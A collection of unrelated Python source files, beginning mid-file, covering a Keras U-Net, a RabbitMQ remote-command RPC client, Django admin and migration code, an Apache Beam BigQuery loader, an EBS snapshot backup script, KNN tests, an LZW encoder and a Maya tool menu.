p1 = tf.keras.layers.MaxPooling2D((2,2))(c1)
c2 = tf.keras.layers.Conv2D(32, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(p1)
c2 = tf.keras.layers.Dropout(0.2)(c2)
c2 = tf.keras.layers.Conv2D(32, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c2)
p2 = tf.keras.layers.MaxPooling2D((2,2))(c2)
c3 = tf.keras.layers.Conv2D(64, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(p2)
c3 = tf.keras.layers.Dropout(0.2)(c3)
c3 = tf.keras.layers.Conv2D(64, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c3)
p3 = tf.keras.layers.MaxPooling2D((2,2))(c3)
c4 = tf.keras.layers.Conv2D(128, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(p3)
c4 = tf.keras.layers.Dropout(0.2)(c4)
c4 = tf.keras.layers.Conv2D(128, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c4)
p4 = tf.keras.layers.MaxPooling2D((2,2))(c4)
c5 = tf.keras.layers.Conv2D(256, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(p4)
c5 = tf.keras.layers.Dropout(0.3)(c5)
c5 = tf.keras.layers.Conv2D(256, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c5)
#Expansive path *****
u6 = tf.keras.layers.Conv2DTranspose(128, (2,2), strides=(2,2), padding='same')(c5)
u6 = tf.keras.layers.concatenate([u6, c4])
c6 = tf.keras.layers.Conv2D(128, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(u6)
c6 = tf.keras.layers.Dropout(0.2)(c6)
c6 = tf.keras.layers.Conv2D(128, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c6)
u7 = tf.keras.layers.Conv2DTranspose(64, (2,2), strides=(2,2), padding='same')(c6)
u7 = tf.keras.layers.concatenate([u7, c3])
c7 = tf.keras.layers.Conv2D(64, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(u7)
c7 = tf.keras.layers.Dropout(0.2)(c7)
c7 = tf.keras.layers.Conv2D(64, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c7)
u8 = tf.keras.layers.Conv2DTranspose(32, (2,2), strides=(2,2), padding='same')(c7)
u8 = tf.keras.layers.concatenate([u8, c2])
c8 = tf.keras.layers.Conv2D(32, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(u8)
c8 = tf.keras.layers.Dropout(0.2)(c8)
c8 = tf.keras.layers.Conv2D(32, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c8)
u9 = tf.keras.layers.Conv2DTranspose(16, (2,2), strides=(2,2), padding='same')(c8)
u9 = tf.keras.layers.concatenate([u9, c1], axis=3)
c9 = tf.keras.layers.Conv2D(16, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(u9)
c9 = tf.keras.layers.Dropout(0.1)(c9)
c9 = tf.keras.layers.Conv2D(16, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c9)
outputs = tf.keras.layers.Conv2D(1, (1,1), activation='sigmoid')(c9)
model = tf.keras.Model(inputs=[inputs], outputs=[outputs])
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
model.summary()
#Fitting model to data ========================================================
#Model checkpointer
checkpointer = tf.keras.callbacks.ModelCheckpoint('UNet_model_for_nuclei.h5', verbose=1, save_best_only=True)
callbacks = [
tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),
tf.keras.callbacks.TensorBoard(log_dir='logs')]
results = model.fit(X_train, Y_train, validation_split=0.1, batch_size=16, epochs=25, callbacks=callbacks)
#Testings/Predictions =========================================================
idx = random.randint(0, len(X_train))
preds_train = model.predict(X_train[:int(X_train.shape[0]*0.9)], verbose=1)
preds_val = model.predict(X_train[int(X_train.shape[0]*0.9):], verbose=1)
preds_test = model.predict(X_test, verbose=1)
preds_train_t = (preds_train > 0.5).astype(np.uint8)
preds_val_t = (preds_val > 0.5).astype(np.uint8)
preds_test_t = (preds_test > 0.5).astype(np.uint8)
#Perform a sanity check on some random training samples
ix = random.randint(0, len(preds_train_t))
imshow(X_train[ix])
plt.show()
plt.imshow(np.squeeze(Y_train[ix]))
plt.show()
#Perform a sanity check on some random validation samples
ix = random.randint(0, len(preds_val_t))
imshow(X_train[int(X_train.shape[0]*0.9):][ix])
plt.show()
plt.imshow(np.squeeze(Y_train[int(Y_train.shape[0]*0.9):][ix]))
plt.show()
plt.imshow(np.squeeze(preds_val_t[ix]))
plt.show()
# ****************************** END OF FILE ********************************** |
#!/usr/bin/env python
# _*_ encoding:utf-8 _*_
__author__='han'
import os,sys
import configparser,pika,random,threading,pickle,time
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0,path)
class Rpc_Clinet(object):
'''
PRC客户端
'''
def __init__(self):
#保存命令结果字典
self.Rpc_dict = {}
self.Get_Conf()
def Get_Conf(self):
'''
获取配置文件
:return:
'''
config = configparser.ConfigParser()
config.read(os.path.join(path,'conf','config.ini'))
self.Host = config['RabbitMQ']['host']
self.Port = int(config['RabbitMQ']['port'])
self.Time_Out = int(config['RabbitMQ']['timeout'])
self.Credentials = pika.PlainCredentials(config['RabbitMQ']['user'],config['RabbitMQ']['pwd'])
def Handler(self):
'''
链接RabbitMQ和信道
:return:
'''
self.Conn = pika.BlockingConnection(
pika.ConnectionParameters(
host=self.Host,
port=self.Port,
credentials=self.Credentials
)
)
self.Channel = self.Conn.channel()
def Command(self):
'''
交互输入命令
:return:
'''
while True:
choice = input('\033[35m>>:\033[0m').strip()
choice_list = choice.split('"')
if choice.startswith('run'):
if len(choice_list) == 3:
cmd = choice_list[1]
host_str = choice_list[2].strip()
if '--host' not in host_str:
print('cmd Error!')
else:
host_group = host_str.split(' ')
host_list = []
task_id = self.Create_Id()
for i in range(1,len(host_group)):
host_list.append(host_group[i])
thread = threading.Thread(
target=self.Run,
args=(task_id,cmd,host_list)
)
thread.start()
continue
else:
print('\033[31mCommand Error!\033[0m')
self.Help()
continue
elif choice.startswith('check_task'):
choice_list = choice.split()
if len(choice_list) ==2:
task_id = choice_list[1]
self.Result(task_id)
else:
print('\033[1;31;1mCommand Error!\033[0m')
self.Help()
continue
elif choice == 'quit':
break
else:
print('\033[1;31;1mCommand Error!\033[0m')
self.Help()
def Help(self):
'''
帮助
:return:
'''
print('\033[1;36;1mrun shell: run "command" [--host hostname]')
print('you must add " at command start and end or it will be error')
print('get result: check_task task_id')
print('input quit to exit\033[0m')
def Run(self,task_id,cmd,host_list):
'''
创建接收消费者返回结果,
并且调用发送命令函数。
:return:
'''
self.Handler()
self.Channel.queue_declare(queue=task_id)
self.Channel.basic_consume(
self.Response,
queue=task_id
)
self.Send_Cmd(task_id,cmd,host_list)
def Send_Cmd(self,task_id,cmd,host_list):
'''
发送函数
:return:
'''
for host in host_list:
self.Rpc_dict[task_id][host] = ''
data = {'cmd':cmd}
self.Channel.exchange_declare(
exchange='rpc',
exchange_type='direct'
)
for host in host_list:
self.Channel.basic_publish(
exchange='rpc',
routing_key=host,
properties=pika.BasicProperties(
reply_to=task_id,
),
body=pickle.dumps(data)
)
for host in host_list:
count = 0
while self.Rpc_dict[task_id][host] == '':
self.Conn.process_data_events()
time.sleep(0.1)
count += 1
if count > self.Time_Out*10:
print('host[%s] connection timeout'%host)
break
def Response(self,ch,method,props,body):
'''
处理接收结果
:return:
'''
task_id = props.message_id
res = pickle.loads(body)['res']
host = props.correlation_id
self.Rpc_dict[task_id][host] = res
#告知已收到
self.Channel.basic_ack(delivery_tag=method.delivery_tag)
def Create_Id(self):
'''创建ID'''
task_id = ''
for i in range(5):
current = random.randrange(0,9)
task_id += str(current)
if task_id in self.Rpc_dict:
self.Create_Id()
else:
self.Rpc_dict[task_id] = {}
print('task_id:',task_id)
return task_id
def Result(self,id):
'''
打印接收的结果,
并清空保存命令字典
:return:
'''
for host in self.Rpc_dict[id]:
print(('host %s')%host.center(50,'-'))
print(self.Rpc_dict[id][host])
del self.Rpc_dict[id]
|
import re
# XXX: need to exclude '_'
command_pattern = r'(\\\w+)'
command_regex = re.compile(command_pattern)
def find_all_commands(filename):
""" Finds all TeX commands used in the file. """
commands = set()
for line in open(filename):
for x in command_regex.findall(line):
commands.add(x)
return commands
def find_all_commands_in_string(s):
return command_regex.findall(s)
|
#!/usr/bin/python3
"""Base object for construction of all heap variants"""
class Node:
def __init__(self, key):
"""contains all pointers that might be needed in any implementation.
Only necessary ones used in each implementation"""
self.key = key
self.parent = None
self.leftChild = None
self.rightChild = None
self.nextSibling = None
self.prevSibling = None
self.leftOnly = False
self.rightOnly = False
self.min = 1000000000 # min key in subtree
self.vertex = None # used for testing with Dijkstra's algorithm
|
from django.core.management.base import BaseCommand, CommandError
import _listen_for_tweets
class Command(BaseCommand):
def handle(self, *args, **options):
_listen_for_tweets.main()
|
from django.contrib import admin
from .models import ImgUpload
@admin.register(ImgUpload)
class ImgUploadAdmin(admin.ModelAdmin):
list_display = (
'imgupload_category',
'imgupload_file',
'imgupload_tags',
'imgupload_uploader',
'imgupload_upload_dttm'
)
list_display_links = list_display
readonly_fields = (
'imgupload_uploader',
'imgupload_upload_dttm'
)
|
#coding: utf-8
from __future__ import print_function, absolute_import
import logging
import re
import json
import requests
import uuid
import time
import os
import argparse
import uuid
import datetime
import socket
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.io.filesystems import FileSystems
from apache_beam.metrics import Metrics
from apache_beam.metrics.metric import MetricsFilter
from apache_beam import pvalue
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
TABLE_SCHEMA = (
'idkey:STRING, '
'fecha:STRING, '
'ZONA:STRING, '
'CODIGO_DE_CIUDAD:STRING, '
'CEDULA_CIUDADANIA:STRING, '
'CODIGO_INTERNO:STRING, '
'TIPO_COMPRADORA:STRING, '
'CUSTOMER_CLASS:STRING, '
'CUPO:STRING, '
'NUMERO_DE_OBLIGACION:STRING, '
'VALOR_FACTURA:STRING, '
'FECHA_FACTURA:STRING, '
'FECHA_VENCIMIENTO:STRING, '
'VALOR_SALDO_EN_CARTERA:STRING, '
'DIAS_DE_VENCIMIENTO:STRING, '
'CAMPANA_ORIGINAL:STRING, '
'ULTIMA_CAMPANA:STRING, '
'CODIGO:STRING, '
'NOMBRE:STRING, '
'APELLIDOS:STRING, '
'TELEFONO_1:STRING, '
'CELULAR:STRING, '
'TEL_CEL_2:STRING, '
'E_MAIL:STRING, '
'AUTORIZO_ENVIO_DE_MENSAJES_DE_TEXTO_A_MI_CELULAR_SI_NO:STRING, '
'AUTORIZO_CORREOS_DE_VOZ_A_MI_CELULAR_SI_NO:STRING, '
'AUTORIZO_ENVIO_DE_E_MAIL_SI_NO:STRING, '
'DIRECCION:STRING, '
'BARRIO:STRING, '
'CIUDAD:STRING, '
'DEPARTAMENTO:STRING, '
'DIRECCION_1:STRING, '
'BARRIO_1:STRING, '
'CIUDAD_1:STRING, '
'DEPARTAMENTO_1:STRING, '
'NOMBRE_REF1:STRING, '
'APELLIDO_1:STRING, '
'PARENTESCO_1:STRING, '
'CELULAR_1:STRING, '
'NOMBRE_REF2:STRING, '
'APELLIDO_2:STRING, '
'PARENTESCO_2:STRING, '
'TELEFONO_2:STRING, '
'CELULAR_2:STRING, '
'DIRECCION_2:STRING, '
'CIUDAD_2:STRING, '
'DEPARTAMENTO_2:STRING, '
'NOMBRE_REF3:STRING, '
'APELLIDO_3:STRING, '
'TELEFONO_3:STRING, '
'CELULAR_3:STRING, '
'DIRECCION_3:STRING, '
'CIUDAD_3:STRING, '
'DEPARTAMENTO_3:STRING, '
'NOMBRE_REF4:STRING, '
'APELLIDO_4:STRING, '
'DIRECCION_4:STRING, '
'TELEFONO_4:STRING, '
'CELULAR_4:STRING, '
'CIUDAD_4:STRING, '
'DEPARTAMENTO_4:STRING, '
'ABOGAD:STRING, '
'DIVSION:STRING, '
'PAIS:STRING, '
'FECHA_DE_PROXIMA_CONFERENCIA:STRING '
)
# ?
class formatearData(beam.DoFn):
def __init__(self, mifecha):
super(formatearData, self).__init__()
self.mifecha = mifecha
def process(self, element):
# print(element)
arrayCSV = element.split(';')
tupla= {'idkey' : str(uuid.uuid4()),
# 'fecha' : datetime.datetime.today().strftime('%Y-%m-%d'),
'fecha': self.mifecha,
'ZONA' : arrayCSV[0],
'CODIGO_DE_CIUDAD' : arrayCSV[1],
'CEDULA_CIUDADANIA' : arrayCSV[2],
'CODIGO_INTERNO' : arrayCSV[3],
'TIPO_COMPRADORA' : arrayCSV[4],
'CUSTOMER_CLASS' : arrayCSV[5],
'CUPO' : arrayCSV[6],
'NUMERO_DE_OBLIGACION' : arrayCSV[7],
'VALOR_FACTURA' : arrayCSV[8],
'FECHA_FACTURA' : arrayCSV[9],
'FECHA_VENCIMIENTO' : arrayCSV[10],
'VALOR_SALDO_EN_CARTERA' : arrayCSV[11],
'DIAS_DE_VENCIMIENTO' : arrayCSV[12],
'CAMPANA_ORIGINAL' : arrayCSV[13],
'ULTIMA_CAMPANA' : arrayCSV[14],
'CODIGO' : arrayCSV[15],
'NOMBRE' : arrayCSV[16],
'APELLIDOS' : arrayCSV[17],
'TELEFONO_1' : arrayCSV[18],
'CELULAR' : arrayCSV[19],
'TEL_CEL_2' : arrayCSV[20],
'E_MAIL' : arrayCSV[21],
'AUTORIZO_ENVIO_DE_MENSAJES_DE_TEXTO_A_MI_CELULAR_SI_NO' : arrayCSV[22],
'AUTORIZO_CORREOS_DE_VOZ_A_MI_CELULAR_SI_NO' : arrayCSV[23],
'AUTORIZO_ENVIO_DE_E_MAIL_SI_NO' : arrayCSV[24],
'DIRECCION' : arrayCSV[25],
'BARRIO' : arrayCSV[26],
'CIUDAD' : arrayCSV[27],
'DEPARTAMENTO' : arrayCSV[28],
'DIRECCION_1' : arrayCSV[29],
'BARRIO_1' : arrayCSV[30],
'CIUDAD_1' : arrayCSV[31],
'DEPARTAMENTO_1' : arrayCSV[32],
'NOMBRE_REF1' : arrayCSV[33],
'APELLIDO_1' : arrayCSV[34],
'PARENTESCO_1' : arrayCSV[35],
'CELULAR_1' : arrayCSV[36],
'NOMBRE_REF2' : arrayCSV[37],
'APELLIDO_2' : arrayCSV[38],
'PARENTESCO_2' : arrayCSV[39],
'TELEFONO_2' : arrayCSV[40],
'CELULAR_2' : arrayCSV[41],
'DIRECCION_2' : arrayCSV[42],
'CIUDAD_2' : arrayCSV[43],
'DEPARTAMENTO_2' : arrayCSV[44],
'NOMBRE_REF3' : arrayCSV[45],
'APELLIDO_3' : arrayCSV[46],
'TELEFONO_3' : arrayCSV[47],
'CELULAR_3' : arrayCSV[48],
'DIRECCION_3' : arrayCSV[49],
'CIUDAD_3' : arrayCSV[50],
'DEPARTAMENTO_3' : arrayCSV[51],
'NOMBRE_REF4' : arrayCSV[52],
'APELLIDO_4' : arrayCSV[53],
'DIRECCION_4' : arrayCSV[54],
'TELEFONO_4' : arrayCSV[55],
'CELULAR_4' : arrayCSV[56],
'CIUDAD_4' : arrayCSV[57],
'DEPARTAMENTO_4' : arrayCSV[58],
'ABOGAD' : arrayCSV[59],
'DIVSION' : arrayCSV[60],
'PAIS' : arrayCSV[61],
'FECHA_DE_PROXIMA_CONFERENCIA' : arrayCSV[62]
}
return [tupla]
def run(archivo, mifecha):
gcs_path = "gs://ct-unificadas" #Definicion de la raiz del bucket
gcs_project = "contento-bi"
mi_runer = ("DirectRunner", "DataflowRunner")[socket.gethostname()=="contentobi"]
pipeline = beam.Pipeline(runner=mi_runer, argv=[
"--project", gcs_project,
"--staging_location", ("%s/dataflow_files/staging_location" % gcs_path),
"--temp_location", ("%s/dataflow_files/temp" % gcs_path),
"--output", ("%s/dataflow_files/output" % gcs_path),
"--setup_file", "./setup.py",
"--max_num_workers", "10",
"--subnetwork", "https://www.googleapis.com/compute/v1/projects/contento-bi/regions/us-central1/subnetworks/contento-subnet1"
# "--num_workers", "30",
# "--autoscaling_algorithm", "NONE"
])
# lines = pipeline | 'Lectura de Archivo' >> ReadFromText("gs://ct-bancolombia/info-segumiento/BANCOLOMBIA_INF_SEG_20181206 1100.csv", skip_header_lines=1)
#lines = pipeline | 'Lectura de Archivo' >> ReadFromText("gs://ct-bancolombia/info-segumiento/BANCOLOMBIA_INF_SEG_20181129 0800.csv", skip_header_lines=1)
lines = pipeline | 'Lectura de Archivo' >> ReadFromText(archivo, skip_header_lines=1)
transformed = (lines | 'Formatear Data' >> beam.ParDo(formatearData(mifecha)))
# lines | 'Escribir en Archivo' >> WriteToText("archivos/Info_carga_banco_prej_small", file_name_suffix='.csv',shard_name_template='')
# transformed | 'Escribir en Archivo' >> WriteToText("archivos/Info_carga_banco_seg", file_name_suffix='.csv',shard_name_template='')
#transformed | 'Escribir en Archivo' >> WriteToText("gs://ct-bancolombia/info-segumiento/info_carga_banco_seg",file_name_suffix='.csv',shard_name_template='')
transformed | 'Escritura a BigQuery Leonisa Estrategia' >> beam.io.WriteToBigQuery(
gcs_project + ":unificadas.prejuridico",
schema=TABLE_SCHEMA,
create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND
)
# transformed | 'Borrar Archivo' >> FileSystems.delete('gs://ct-avon/prejuridico/AVON_INF_PREJ_20181111.TXT')
# 'Eliminar' >> FileSystems.delete (["archivos/Info_carga_avon.1.txt"])
jobObject = pipeline.run()
# jobID = jobObject.job_id()
return ("Corrio Full HD")
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-28 20:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0002_auto_20170228_1941'),
]
operations = [
migrations.AddField(
model_name='user',
name='last_4_digits',
field=models.CharField(default='0000', max_length=4),
),
]
|
from Tested_Method.MethodToTest import Add,ComplexFunc
from unittest.mock import patch
TESTED_MODULE = 'Tested_Method.MethodToTest'
@patch(f'{TESTED_MODULE}.Add')
def test_ComplexFunc_is_called_three_times_with_5_2_10(mock_Add):
#given
x = 2
#when
ComplexFunc(x)
#than
mock_Add.assert_any_call(x,2)
mock_Add.assert_any_call(x,10)
mock_Add.assert_any_call(x,5) |
import fileinput
import sys
#config_file = "/usr/local/etc/colte/config.yml"
config_file = "/usr/bin/colte/roles/configure/vars/main.yml"
def replace(searchExp,replaceExp):
for line in fileinput.input(config_file, inplace=1):
if searchExp in line:
line = replaceExp
sys.stdout.write(line)
enb_iface = raw_input('network interface that eNB connects to (default eth0): ')
enb_iface_addr = raw_input('address of network interface mentioned above (default 1.2.3.4/24): ')
wan_iface = raw_input('network interface that connects to Internet (default eth0): ')
lte_subnet = raw_input('subnet for assigning LTE addresses (default 192.168.151.0/24): ')
network_name = raw_input('name of LTE network (default colte): ')
replace("enb_iface:", "enb_iface: \"" + enb_iface + "\"\n")
replace("enb_iface_addr:", "enb_iface_addr: \"" + enb_iface_addr + "\"\n")
replace("wan_iface:", "wan_iface: \"" + wan_iface + "\"\n")
replace("lte_subnet:", "lte_subnet: \"" + lte_subnet + "\"\n")
replace("network_name:", "network_name: \"" + network_name + "\"\n")
|
import numpy as np
from knn_implementation import KNN_Classification, KNN_Regression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import KFold
import matplotlib.pyplot as plt
def testWithSklearn(k):
neigh = KNeighborsClassifier(k)
L = cross_val_score(neigh, self.X, self.Y, scoring = 'accuracy',
cv = KFold(n_splits=len(self.X)))
return np.mean(L)
print('Test the implementation based on sklearn KNeighborsClassifier')
print('Test KNN classification, without weighted distance')
print('My solution sklearn')
myList = []
skList = []
##for k in range(1, 20):
## knn = KNN_Classification('./data/ionosphere.arff.txt', k)
##
## myRes = knn.LOOCV()
##
## neigh = KNeighborsClassifier(k)
## L = cross_val_score(neigh, knn.X, knn.Y, scoring = 'accuracy',
## cv = KFold(n_splits=len(knn.X)))
##
## skRes = np.mean(L)
## myList.append(myRes)
## skList.append(skRes)
## print(f'{myRes:.12f}',end='')
## print(' ', skRes)
##plt.plot(myList, label='My implement')
##plt.plot(skList, label='sklearn')
##plt.xlabel('k')
##plt.ylabel('accuracy')
##plt.legend()
##plt.show()
print('\nTest KNN classification, with weighted distance')
print('My solution sklearn')
for k in range(1, 20):
knn = KNN_Classification('./data/ionosphere.arff.txt', k)
myRes = knn.LOOCV_weight_distance()
neigh = KNeighborsClassifier(k, weights='distance')
L = cross_val_score(neigh, knn.X, knn.Y, scoring = 'accuracy',
cv = KFold(n_splits=len(knn.X)))
skRes = np.mean(L)
myList.append(myRes)
skList.append(skRes)
print(f'{myRes:.12f}',end='')
print(' ', skRes)
plt.plot(myList, label='My implement')
plt.plot(skList, label='sklearn')
plt.xlabel('k')
plt.ylabel('accuracy')
plt.legend()
plt.show()
import sys
sys.exit()
print('\nTest KNN regression, without weighted distance')
print('My solution sklearn')
for i in range(1, 20):
knn = KNN_Regression('./data/autos.arff.txt', i)
myRes = knn.LOOCV_weight_distance()
print(f'{myRes:.12f}',end='\n')
|
from django.contrib import admin
from .models import *
# Register your models here.
class announcement_titleAdmin(admin.ModelAdmin):
list_display=["title"]
admin.site.register(announcement_title,announcement_titleAdmin)
class announcement_dataAdmin(admin.ModelAdmin):
list_display=["title",'subtitle',"issuer",'active','content']
admin.site.register(announcement_data,announcement_dataAdmin)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
%matplotlib inline
dti = pd.date_range('2016/01/01', freq='M', periods=12)
rnd = np.random.standard_normal(len(dti)).cumsum()**2
df = pd.DataFrame(rnd, columns=['data'], index=dti)
df.plot()
plt.show()
|
#!/usr/bin/env python3
import serial
import picamera
ser = serial .Serial('/dev/ttyACM0', 9600)
ser.write(b'0')
data= ser.readline()
print(data)
|
#!/usr/bin/env python
import sys
import boto.ec2
from boto.utils import get_instance_metadata
import logging
import argparse
import time
import datetime
import subprocess
if sys.version_info < (2, 6):
if __name__ == "__main__":
sys.exit("Error: we need python >= 2.6.")
else:
raise Exception("we need python >= 2.6")
def get_volume(conn, device):
'''Returns volume to make snapshot'''
instance_id = get_instance_metadata()["instance-id"]
logging.debug("Our instanceID is %s" % instance_id)
volumes = conn.get_all_volumes(filters={
'attachment.instance-id': instance_id,
'attachment.device': device})
logging.debug("Our volume is %s" % volumes[0])
return volumes[0]
def stop_service(name):
'''Stop some service, e.g. db, before doing the snapshot'''
logging.debug("Stopping %s" % name)
subprocess.check_call(["/sbin/stop", name])
# Sync and sleep for 2 seconds to settle things
subprocess.check_call(["/bin/sync"])
time.sleep(2)
def start_service(name):
'''Start service after doing the snapshot'''
logging.debug("Starting %s" % name)
subprocess.check_call(["/sbin/start", name])
def create_snapshot(conn, volume, snapshot_tags, snapshot_description=None):
'''Create snapshot object with the description and tags.'''
snapshot = volume.create_snapshot(snapshot_description)
logging.debug("Created snapshot: %s" % snapshot)
# Add tags to the snapshot
for tagname, tagvalue in snapshot_tags.iteritems():
snapshot.add_tag(tagname, tagvalue)
logging.debug("Tagged snapshot: %s with tags: %s"
% (snapshot, snapshot_tags))
return snapshot
def params_to_dict(tags):
""" Reformat tag-value params into dictionary. """
tags_name_value_list = [tag[0].split(':') for tag in tags]
return dict(tags_name_value_list)
def cleanup_snapshots(conn, snapshots_tags, retention):
'''Delete older than retention age snapshots with specified tags.'''
# Date for older snapshots
retention_date = (datetime.datetime.today() -
datetime.timedelta(days=retention)
).strftime('%Y-%m-%dT%H:%M:%S')
logging.debug("Retention date: %s" % retention_date)
# Form filter dictionary
filter_dict = {}
for key, val in snapshots_tags.iteritems():
filter_dict["tag:" + key] = val
snapshots = conn.get_all_snapshots(owner="self", filters=filter_dict)
logging.debug("Snapshots list that matches tags:" % snapshots)
# Delete stale snapshots
if snapshots:
stale_snapshots = [snapshot for snapshot in snapshots
if snapshot.start_time < retention_date]
logging.debug("Stale snapshots that are older"
"than retention date %s: %s"
% (retention_date, stale_snapshots))
for snapshot in stale_snapshots:
snapshot.delete()
logging.info("Deleted snapshot: %s" % snapshot)
else:
stale_snapshots = None
return stale_snapshots
def main():
# Parse all arguments
epilog = "EXAMPLE: %(prog)s --device /dev/xvdg --tag-value Environment:dev --tag-value Role:mysql-backup"
description = "Create snapshot for EBS volume with some data with optional stop of some service"
"that produced that data. Older than retention time snapshots are deleted"
parser = argparse.ArgumentParser(description=description, epilog=epilog)
parser.add_argument("--snapshot-description", "-T",
type=str, default=None,
help="The description to create snapshot with")
parser.add_argument("--service", "-s",
type=str, default=None,
help="Service to stop before and start after the volume snapshot")
parser.add_argument("--device", "-d",
type=str,
required=True,
help="Device of the volume snapshot")
parser.add_argument("--retention", "-r",
type=int, default=30,
help="Delete snapshots older than specified"
"retention days period")
parser.add_argument("--tag-value", "-t",
dest="tags",
action="append",
nargs="*",
required=True,
help="Tag:value to mark volume with,"
"used to cleanup older volumes as well.")
parser.add_argument("--loglevel",
type=str, default='INFO',
choices=['DEBUG', 'INFO', 'WARNING',
'ERROR', 'CRITICAL',
'debug', 'info', 'warning',
'error', 'critical'],
help="set output verbosity level")
args = parser.parse_args()
# Print help on missing arguments
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
tags_dict = params_to_dict(args.tags)
logging.basicConfig(format='%(asctime)s %(name)s %(levelname)s: %(message)s',
level=getattr(logging, args.loglevel.upper(), None))
# Output will be like: "2013-05-12 13:00:09,934 root WARNING: some warning text"
logging.info("====================================================")
logging.info("Started backup of volume")
logging.debug("Used volume device: %s" % args.device)
logging.debug("Used snapshot tags: %s" % tags_dict)
logging.debug("Used snapshot retention period: %s" % args.retention)
logging.debug("Used snapshot description: %s" % args.snapshot_description)
# NOTE: for EC2 connection we rely on the presence of:
# * ~/.boto or /etc/boto.cfg config files or
# * AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environmental variables
# * or IAM instance profile
try:
conn = boto.ec2.connect_to_region(get_instance_metadata()
["placement"]
["availability-zone"][:-1])
except:
logging.exception("Failure getting EC2 API connection")
sys.exit(1)
try:
volume = get_volume(conn, args.device)
except:
logging.exception("Failure getting the volume")
sys.exit(1)
# Stop service before making snapshot
if args.service:
try:
stop_service(args.service)
except:
logging.exception("Failure stopping %s" % args.service)
else:
logging.info("%s stopped for backup" % args.service)
# Make snapshot, tag it and start any service
try:
snapshot = create_snapshot(conn, volume,
tags_dict,
args.snapshot_description)
except:
logging.exception("Failure making snapshot")
sys.exit(1)
else:
logging.info("Created new snapshot %s" % snapshot)
logging.info("Tagged snapshot with tags %s" % tags_dict)
finally:
if args.service:
start_service(args.service)
# Perform cleanup of older snapshots
try:
removed_snapshots = cleanup_snapshots(conn,
tags_dict,
args.retention)
except:
logging.exception("Failure cleaning up snapshots")
sys.exit(1)
else:
if removed_snapshots:
logging.info("Deleted stale snapshots %s" % removed_snapshots)
else:
logging.info("No stale snapshots were removed")
logging.info("====================================================")
if __name__ == '__main__':
main()
|
import numpy as np
# Load the file
input_chars = []
with open('lzw_input.txt', 'r') as in_file:
for line in in_file:
input_chars.append(line.strip())
# Add initial entries to the table
table = []
for i in range(256):
table.append(chr(i))
# Start coding
output_nums = []
p = input_chars.pop(0)
while len(input_chars) > 0:
c = input_chars.pop(0)
if p+c in table:
p += c
else:
output_nums.append(table.index(p))
table.append(p+c)
p = c
output_nums.append(table.index(p))
# Write code to file
with open('lzw_compressed.lzw', 'w') as out_file:
for n in output_nums:
out_file.write(str(n)+'\n')
|
import pymel.core as pm
import maya.cmds as cmds
import maya.mel as mel
import os
from xml.dom.minidom import parse
menu_label = ''
menu_name = 'TAS_Tools'
def get_root_path():
dir_path = os.path.abspath(os.path.join(__file__,"../.."))
root = os.path.join(dir_path,"Tools")
return root
def load_info(filename):
dom = parse(filename)
tool_info = {}
try:
rootTree = dom.getElementsByTagName('ToolInfo')
# Get the name
for node in rootTree[0].getElementsByTagName("Name"):
appname = node.firstChild.data
# Get the departments
for node in rootTree[0].getElementsByTagName("Department"):
dept = node.firstChild.data
# Get the ToolHelp
for node in rootTree[0].getElementsByTagName("ToolHelp"):
tool = node.firstChild.data
# Get the description
for node in rootTree[0].getElementsByTagName("Description"):
desc = node.firstChild.data
# Get the application path
basepath = os.path.dirname(filename)
for filename in os.listdir(basepath):
if filename.endswith("command.py"):
script_path = os.path.join(basepath,filename)
#collection = appname, tool, desc
#tool_info [dept] = collection
tool_info = dept, appname, script_path
except:
pass
return tool_info
def buildMenu(parent):
""" Searches the root folder for tools and folders. These are added
to the parent menu and sorted.
Args:
parent: parent menu item to add items to
root: find tools starting in this folder
"""
root = get_root_path()
if not os.path.exists(root):
return
menu_tool = []
menu_items = []
# Generate the list of menu items.
for root, dirs, files in os.walk(root):
for file in files:
if file.endswith("tool_info.xml"):
tool_file = os.path.join(root, file)
tool_info = load_info(tool_file)
menu_tool.append(tool_info)
if file.endswith("sub_menu.xml"):
menu_item = os.path.basename(root)
menu_items.append(menu_item)
# Create the sorted menu.
tool_dict = dict()
print menu_tool
for tool in menu_tool:
if tool[0] in tool_dict:
# append the new number to the existing array at this slot
tool_dict[tool[0]].append((tool[1], tool[2]))
else:
# create a new array in this slot
tool_dict[tool[0]] = [(tool[1], tool[2])]
# print tool_dict, "KK"
''' [(u'Animation', u'GPU Cache Switch', 'C:\\Users\\t_adame\\Documents\\Git\\TAS_Dev\\Maya_Scripts\\Tools\\Animation\\GPU_Cache\\command.py'),
(u'Utilities', u'Object Counter ', 'C:\\Users\\t_adame\\Documents\\Git\\TAS_Dev\\Maya_Scripts\\Tools\\Utilities\\ObjectCounter\\command.py'),
